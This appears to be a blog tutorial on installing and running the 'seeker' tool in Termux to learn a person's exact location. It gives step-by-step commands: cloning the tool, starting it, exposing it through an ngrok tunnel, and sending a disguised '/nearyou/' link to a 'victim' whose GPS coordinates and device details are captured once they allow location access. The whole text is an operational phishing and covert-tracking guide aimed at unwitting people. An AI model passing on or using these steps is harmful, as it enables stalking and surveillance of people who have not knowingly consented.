Track the exact location using seeker tool in Termux



TO TRACK THE EXACT LOCATION WE NEED SEEKER TOOL IN TERMUX 
                          Here's a commands how to install seeker in termux 

🔰SEEKER COMMANDS🔰

$ apt update

$ apt upgrade

$ pkg install git php curl python

$ pkg install openssh

$ pkg install python2

$git clone https://github.com/himal9626/seeker.git

$ ls

$ cd seeker

$ ls

$ chmod +x  *

$ ls

$ bash termux-install.sh

After installing seeker tool in termux type 

$ python3 seeker.py -t manual 

It starts executing the seeker and it shows like this 
After executing it , swipe from left and select create a new session option to create a new session

After creating a new session type the Command below 

$ ngrok http 8080

( NOTE : BEFORE RUNNING THIS COMMAND TURN YOUR HOTSOT ON )

After typing this command it will show like this
Just copy the given URL 

And add /nearyou/ at the end of the copied URL and send it to the victim to whose location you want to know

When the victim clicks the link he will be directed this page and when the user press continue option

It will ask for location permission and when user gives allow you'll get the location in your terminal orelse you won't get the location

When you see the terminal you can get the details of the victim and his exact location comes with Google map link copy that and paste in your browser to see the exact location in Map .


Thanks for reading my blog !! 

If you're new to the termux read the previous two termux tutorial blog you can understand.

I have included termux beginner commands for beginners make use of it 

I'll post new awesome tools on my next termux tutorial blog

Post a Comment

0 Comments